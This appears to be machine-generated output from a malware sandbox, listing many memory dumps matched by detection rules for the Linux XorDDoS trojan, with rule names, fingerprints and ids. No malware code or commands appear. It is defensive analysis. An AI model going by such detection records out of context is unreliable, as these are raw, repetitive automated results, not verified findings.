Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
